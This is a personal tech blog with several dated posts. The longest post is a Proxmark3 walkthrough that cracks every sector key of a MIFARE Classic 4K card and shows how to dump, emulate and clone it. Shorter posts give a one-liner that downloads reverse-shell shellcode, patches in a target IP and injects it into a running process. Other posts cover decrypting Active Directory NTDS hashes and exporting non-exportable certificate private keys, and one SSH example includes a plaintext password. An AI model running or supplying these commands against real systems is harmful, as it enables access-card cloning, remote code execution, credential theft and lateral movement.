Juil 282024
 

I got myself a proxmark3 device lately, for fun.

I will not spend time explaining how to flash the device or install proxspace and pm3 as it all explained here.

Lets start with identifying the card we have in hands.

[usb] pm3 --> hf search
[|] Searching for ISO14443-A tag…
[+] UID: 94 13 70 EE
[+] ATQA: 00 02
[+] SAK: 18 [2]
[+] Possible types:
[+] MIFARE Classic 4K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Prng detection……. hard
[?] Hint: try hf mf commands

[+] Valid ISO 14443-A tag found

What we got here is a mifare classic 4k.

Lets see if we can find keys to decrypt this card with a simple (but fast) chk command.

[usb] pm3 --> hf mf chk --4k
[+] loaded 61 keys from hardcoded default array
[=] Start check for keys...
[=] .................................................................................
[=] time in checkkeys 12 seconds

[=] testing to read key B...

[+] found keys:

[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+]  017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  031 | 127 | ------------ | 0 | ------------ | 0
[+]  032 | 143 | ------------ | 0 | ------------ | 0
[+]  033 | 159 | ------------ | 0 | ------------ | 0
[+]  034 | 175 | ------------ | 0 | ------------ | 0
[+]  035 | 191 | ------------ | 0 | ------------ | 0
[+]  036 | 207 | ------------ | 0 | ------------ | 0
[+]  037 | 223 | ------------ | 0 | ------------ | 0
[+]  038 | 239 | ------------ | 0 | ------------ | 0
[+]  039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details

We got some keys missing … lets try with a dictionary attack.

[usb] pm3 --> hf mf chk --4k -f mfc_default_keys
[+] loaded 61 keys from hardcoded default array
[+] Loaded 1887 keys from dictionary file `C:\_apps\ProxSpace\pm3\proxmark3\client\dictionaries/mfc_default_keys.dic`
[=] Start check for keys...
[=] ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[=] time in checkkeys 249 seconds

[=] testing to read key B...

[+] found keys:

[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+]  017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  031 | 127 | ------------ | 0 | ------------ | 0
[+]  032 | 143 | ------------ | 0 | ------------ | 0
[+]  033 | 159 | ------------ | 0 | ------------ | 0
[+]  034 | 175 | ------------ | 0 | ------------ | 0
[+]  035 | 191 | ------------ | 0 | ------------ | 0
[+]  036 | 207 | ------------ | 0 | ------------ | 0
[+]  037 | 223 | ------------ | 0 | ------------ | 0
[+]  038 | 239 | ------------ | 0 | ------------ | 0
[+]  039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details

Still no luck…

Lets be more aggressive with a autopwn attack which will basically use all possible attacks (sparing us the hassle to to try them one by one or in some cases going block per block).

Note that I am skipping the -f mfc_default_keys.dic here since the previous dictionary attack did not prove useful.

[usb] pm3 --> hf mf autopwn --4k
[!] no known key was supplied, key recovery might fail
[+] loaded  5 user keys
[+] loaded 61 keys from hardcoded default array
[=] running strategy 1
[=] ...
[=] running strategy 2
[=] ....
[+] target sector   0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector   0 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector   1 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   1 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   2 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   2 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   6 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector   9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  16 key type A -- found valid key [ A0A1A2A3A4A5 ]
[+] target sector  16 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector  17 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  17 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  18 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  18 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  19 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  19 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  20 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  20 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  21 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  21 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  22 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  22 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  23 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  23 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  24 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  24 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  25 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  25 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  26 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  26 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  27 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  27 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  28 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  28 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  29 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  29 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  30 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector  30 key type B -- found valid key [ FFFFFFFFFFFF ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]          |         |                                                         | Expected to brute force
[=]  Time    | #nonces | Activity                                                | #states         | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]        0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
[=]        0 |       0 | Brute force benchmark: 509 million (2^28.9) keys/s      | 140737488355328 |    3d
[=]        5 |       0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 5226 ms               | 140737488355328 |    3d
[=]        5 |       0 | Using 239 precalculated bitflip state tables            | 140737488355328 |    3d
[=]       10 |     112 | Apply bit flip properties                               |     35058302976 |   69s
[=]       11 |     224 | Apply bit flip properties                               |     24066930688 |   47s
[=]       12 |     334 | Apply bit flip properties                               |     17448558592 |   34s
[=]       13 |     444 | Apply bit flip properties                               |      9945160704 |   20s
[=]       14 |     555 | Apply bit flip properties                               |      9036183552 |   18s
[=]       15 |     667 | Apply bit flip properties                               |      7640147968 |   15s
[=]       16 |     779 | Apply bit flip properties                               |      6678748160 |   13s
[=]       17 |     890 | Apply bit flip properties                               |      6678748160 |   13s
[=]       18 |    1000 | Apply bit flip properties                               |      6347502592 |   12s
[=]       18 |    1112 | Apply bit flip properties                               |      6347502592 |   12s
[=]       18 |    1223 | Apply bit flip properties                               |      6347502592 |   12s
[=]       19 |    1332 | Apply bit flip properties                               |      6347502592 |   12s
[=]       20 |    1442 | Apply bit flip properties                               |      6347502592 |   12s
[=]       23 |    1552 | Apply Sum property. Sum(a0) = 128                       |       262742304 |    1s
[=]       24 |    1664 | Apply bit flip properties                               |       262742304 |    1s
[=]       25 |    1771 | Apply bit flip properties                               |       262742304 |    1s
[=]       26 |    1879 | Apply bit flip properties                               |       262742304 |    1s
[=]       26 |    1879 | (Ignoring Sum(a8) properties)                           |       262742304 |    1s
[=]       27 |    1879 | Brute force phase completed.  Key found: E704822D6AED   |               0 |    0s
[+] target sector  31 key type A -- found valid key [ E704822D6AED ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]          |         |                                                         | Expected to brute force
[=]  Time    | #nonces | Activity                                                | #states         | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]        0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
[=]        0 |       0 | Brute force benchmark: 493 million (2^28.9) keys/s      | 140737488355328 |    3d
[=]        3 |       0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2696 ms               | 140737488355328 |    3d
[=]        3 |       0 | Using 239 precalculated bitflip state tables            | 140737488355328 |    3d
[=]        7 |     112 | Apply bit flip properties                               |    646552223744 | 22min
[=]        8 |     224 | Apply bit flip properties                               |    495434760192 | 17min
[=]        9 |     336 | Apply bit flip properties                               |    474214105088 | 16min
[=]       10 |     448 | Apply bit flip properties                               |    422348587008 | 14min
[=]       11 |     560 | Apply bit flip properties                               |    422348587008 | 14min
[=]       12 |     671 | Apply bit flip properties                               |    422348587008 | 14min
[=]       13 |     783 | Apply bit flip properties                               |    422348587008 | 14min
[=]       14 |     893 | Apply bit flip properties                               |    422348587008 | 14min
[=]       15 |    1005 | Apply bit flip properties                               |    369272356864 | 12min
[=]       15 |    1117 | Apply bit flip properties                               |    369272356864 | 12min
[=]       16 |    1227 | Apply bit flip properties                               |    369272356864 | 12min
[=]       17 |    1338 | Apply bit flip properties                               |    369272356864 | 12min
[=]       17 |    1447 | Apply bit flip properties                               |    369272356864 | 12min
[=]       18 |    1559 | Apply bit flip properties                               |    369272356864 | 12min
[=]       19 |    1669 | Apply bit flip properties                               |    369272356864 | 12min
[=]       20 |    1776 | Apply bit flip properties                               |    369272356864 | 12min
[=]       21 |    1887 | Apply bit flip properties                               |    369272356864 | 12min
[=]       23 |    1997 | Apply Sum property. Sum(a0) = 128                       |     54618914816 |  2min
[=]       24 |    2106 | Apply bit flip properties                               |     54618914816 |  2min
[=]       25 |    2215 | Apply bit flip properties                               |     54618914816 |  2min
[=]       25 |    2324 | Apply bit flip properties                               |     54618914816 |  2min
[=]       26 |    2324 | (Ignoring Sum(a8) properties)                           |     54618914816 |  2min
[=]       89 |    2324 | Brute force phase completed.  Key found: EAE581E19550   |               0 |    0s
[+] target sector  31 key type B -- found valid key [ EAE581E19550 ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]          |         |                                                         | Expected to brute force
[=]  Time    | #nonces | Activity                                                | #states         | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=]        0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
[=]        0 |       0 | Brute force benchmark: 411 million (2^28.6) keys/s      | 140737488355328 |    4d
[=]        3 |       0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2965 ms               | 140737488355328 |    4d
[=]        3 |       0 | Using 239 precalculated bitflip state tables            | 140737488355328 |    4d
[=]        7 |     112 | Apply bit flip properties                               |   1300592066560 | 53min
[=]        8 |     224 | Apply bit flip properties                               |    956737191936 | 39min
[=]        9 |     336 | Apply bit flip properties                               |    788323893248 | 32min
[=]       10 |     448 | Apply bit flip properties                               |    699458519040 | 28min
[=]       11 |     559 | Apply bit flip properties                               |    611835576320 | 25min
[=]       12 |     669 | Apply bit flip properties                               |    604953968640 | 25min
[=]       13 |     781 | Apply bit flip properties                               |    546183413760 | 22min
[=]       14 |     891 | Apply bit flip properties                               |    497112612864 | 20min
[=]       15 |    1002 | Apply bit flip properties                               |    497112612864 | 20min
[=]       16 |    1110 | Apply bit flip properties                               |    497112612864 | 20min
[=]       18 |    1221 | Apply Sum property. Sum(a0) = 160                       |     30699894784 |   75s
[=]       18 |    1331 | Apply bit flip properties                               |     29279275008 |   71s
[=]       19 |    1439 | Apply bit flip properties                               |     29279275008 |   71s
[=]       20 |    1547 | Apply bit flip properties                               |     29279275008 |   71s
[=]       21 |    1658 | Apply bit flip properties                               |     28913727488 |   70s
[=]       21 |    1658 | (1. guess: Sum(a8) = 0)                                 |     28913727488 |   70s
[=]       22 |    1658 | Apply Sum(a8) and all bytes bitflip properties          |     28548368384 |   69s
[=]       22 |    1658 | (2. guess: Sum(a8) = 32)                                |     96629514240 |  4min
[=]       23 |    1658 | Apply Sum(a8) and all bytes bitflip properties          |     96404660224 |  4min
[=]       23 |    1658 | (3. guess: Sum(a8) = 64)                                |    201095266304 |  8min
[=]       25 |    1658 | Apply Sum(a8) and all bytes bitflip properties          |    199944667136 |  8min
[=]       25 |    1658 | Brute force phase completed.  Key found: A989077ECCED   |               0 |    0s
[+] target sector  32 key type A -- found valid key [ A989077ECCED ]
[+] target sector  32 key type B -- found valid key [ A989077ECCED ]
[+] target sector  33 key type A -- found valid key [ A989077ECCED ]
[+] target sector  33 key type B -- found valid key [ A989077ECCED ]
[+] target sector  34 key type A -- found valid key [ A989077ECCED ]
[+] target sector  34 key type B -- found valid key [ A989077ECCED ]
[+] target sector  35 key type A -- found valid key [ A989077ECCED ]
[+] target sector  35 key type B -- found valid key [ A989077ECCED ]
[+] target sector  36 key type A -- found valid key [ A989077ECCED ]
[+] target sector  36 key type B -- found valid key [ A989077ECCED ]
[+] target sector  37 key type A -- found valid key [ A989077ECCED ]
[+] target sector  37 key type B -- found valid key [ A989077ECCED ]
[+] target sector  38 key type A -- found valid key [ A989077ECCED ]
[+] target sector  38 key type B -- found valid key [ A989077ECCED ]
[+] target sector  39 key type A -- found valid key [ A989077ECCED ]
[+] target sector  39 key type B -- found valid key [ A989077ECCED ]

[+] found keys:

[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+]  001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  016 | 067 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+]  017 | 071 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  018 | 075 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  019 | 079 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  020 | 083 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  021 | 087 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  022 | 091 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  023 | 095 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  024 | 099 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  025 | 103 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  026 | 107 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  027 | 111 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  028 | 115 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  029 | 119 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  030 | 123 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  031 | 127 | E704822D6AED | H | EAE581E19550 | H
[+]  032 | 143 | A989077ECCED | H | A989077ECCED | R
[+]  033 | 159 | A989077ECCED | R | A989077ECCED | R
[+]  034 | 175 | A989077ECCED | R | A989077ECCED | R
[+]  035 | 191 | A989077ECCED | R | A989077ECCED | R
[+]  036 | 207 | A989077ECCED | R | A989077ECCED | R
[+]  037 | 223 | A989077ECCED | R | A989077ECCED | R
[+]  038 | 239 | A989077ECCED | R | A989077ECCED | R
[+]  039 | 255 | A989077ECCED | R | A989077ECCED | R
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA  )
[?] MAD key detected. Try `hf mf mad` for more details


[+] Generating binary key file
[+] Found keys have been dumped to `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-key.bin`
[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0
[=] transferring keys to simulator memory ( ok )
[=] dumping card content to emulator memory (Cmd Error: 04 can occur)
[=] downloading card content from emulator memory
[+] Saved 4096 bytes to binary file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.bin`
[+] Saved to json file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.json`
[=] autopwn execution time: 166 seconds

Ok, this time we got lucky and all keys were found within 166 seconds (on my slow computer…).

Note that the keys have been conveniently dumped to hf-mf-941370EE-key.bin.

The content of the card itself has been dumped to hf-mf-941370EE-dump.bin.

At this stage you can dump the card (again) at any point with this command:

hf mf dump --4k --keys hf-mf-941370EE-key.bin

You can also simulate the card with this command :

hf mf sim -u 941370EE --4k

And last but not least you can restore the dump to a blank card (effectively cloning the original card) with this command :

#for a gen1 card
hf mf cload --4k -f hf-mf-941370EE-dump.bin
#for a gen2 card - notice that you need the keyfile of the target card to be able to write your dump
#note that we are passing the original uid sparing us the extra command hf mf csetuid -u 941370EE 
hf mf restore --4k --uid 941370EE -k hf-mf-target-key.bin -f hf-mf-941370EE-dump.bin

Extra notes, you can test the reading with a block or sector with a key the following way :

hf mf rdbl --blk 127 -b -k EAE581E19550
hf mf rdsc --sec 31 -a -k E704822D6AED
Oct 292023
 

Get your binaries from here.

On your source host, generate a ssh key pair (private and public) : ssh-keygen

Copy your public key on your target host

Add your public key to authorized keys on your target host : cat id_rsa.pub >> .ssh/authorized_keys

SFTP from your source to target host using your private key : sftp –ip=192.168.1.126 –username=jeedom –privatekey=%homepath%\.ssh\id_rsa –local_filename=readme.md –command=put –debug=true

SSH from your source to target host using your private key : ssh –ip=192.168.1.126 –username=jeedom –privatekey=%homepath%\.ssh\id_rsa –debug=true

Note1 : libssh2 will accept private keys in both format (RSA PRIVATE KEY or OPENSSH PRIVATE KEY)

Note2 : on linux, you can convert a public key generated by OpenSSL (in PEM format) to OpenSSH

ssh-keygen -i -m PKCS8 -f public.pem > public.pub

Note3 : libssh2 will accept public keys in OpenSSH format only (but will manage to derive the public key from the private key if you dont provide the public key)

Note4:

You can push your public key like below:

ssh –ip=192.168.1.126 –username=jeedom –password=Mjeedom96 –put –filename=id_rsa.pub

ssh –ip=192.168.1.126 –username=jeedom –password=Mjeedom96 –delay=250 –command= »cat id_rsa.pub >> .ssh/authorized_keys »

or

echo « cat id_rsa.pub >> .ssh/authorized_keys » | ssh –ip=192.168.1.126 –username=jeedom –password=Mjeedom96

Oct 282023
 

On both hosts:

Install GPG (download from here)

Generate a key pair : gpg –gen-key

List your public keys : gpg –list-keys (optional)

List your secret/private keys : gpg –list-secret-keys (optional)

On the host encrypting (aka the source):

Import your target key (i.e from the host that will decrypt) : gpg –import target.key

Ensure that you have the public key of the target in your trust store : gpg –list-keys

Encrypt your file with the target public key : gpg -e -r target message.txt (or gpg –always-trust -e -r target message.txt if you dont want to be bothered by the public key not being trusted)

note : more details here about user interaction.

On the host decrypting (aka the target):

Export your public key : gpg –export > target.key (to be shared with the source host encrypting)

Decrypt the file with the secret/private key : gpg message.txt.gpg

Juil 312023
 

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps :

-download a binary and convert it to its textual hexa form

-replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190)

-inject the shellcode into the memory of the specified pid and execute it

on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)

Juil 092023
 

Decrypt NTDS (aka NT Directory Service) active directory hashes for servers up to windows 2012r2 (rc4) and windows 2016 and up (aes). NTDS uses the Extensible Storage Engine format (aka ESE).

You can obtain the systemkey offline using nthash and the system registry file.

Sourcecode and binary are here.

Avr 042023
 

You need to boot in UEFI mode but do not want to convert your disk to GPT (with mbr2gpt for instance)?

-free some disk space (by shrinking you main partition for instance)

-create a FAT32 partition

-make your partition bootable with bcdboot c:\windows /s g: /f all (with g: being your new partition)

-now, shutdown your computer, modify your bios to UEFI, reboot and enjoy!

Mar 302023
 

In a previous article (here), we have seen how to export a certificate and its non exportable key using a rather complex method (decrypting DPAPI).

Here below how to do it the easy way (by hooking a rsaenh.dll api) :

cert –export –store=root –subject= »Root Authority » –force

-> you get a cert.pfx containing both the certificate and the private key.

Import and enjoy !

Mar 262023
 

You want to export a certificate but its private key is marked as non exportable.

Lets export it using the hard way (a future article with demonstrate an easier method).

To realize this operation we will need:

-CAPI-FPC (here) : using windows crypto API’s (aka CAPI)

-NTHASH-FPC (here) : a tool to handle hashes and ciphers with a particular focus on windows secrets and lateral movement

-TinySSL (here) : a tool based on OpenSSL library to deal with various formats for X.509 certificates, CSRs, and cryptographic keys

1/ Identify the cert sha1 hash and save it from registry to a cer file
cert –enumcerts –store=root
->9EC82D0810FACD26CF5DE736C4F17228DDF49BBC is the cert sha1 hash

->d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 is the cert unique name

cert –dumpcert –store=root –hash=9EC82D0810FACD26CF5DE736C4F17228DDF49BBC
->you get a blob.cer i.e your cert (without the private key)

Lets convert this binary cert (DER format) to a PEM format:

cert.exe –der2pem –filename=blob.cer

->you get a blob.crt

2/ Decode dpapi blob located in C:\Users\%username%\AppData\Roaming\Microsoft\Crypto\RSA\%SID%
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05

->this is your encrypted (with a masterkey) DPAPI blob

Note : you can skip this test as the blob will be decrypted in step 4.

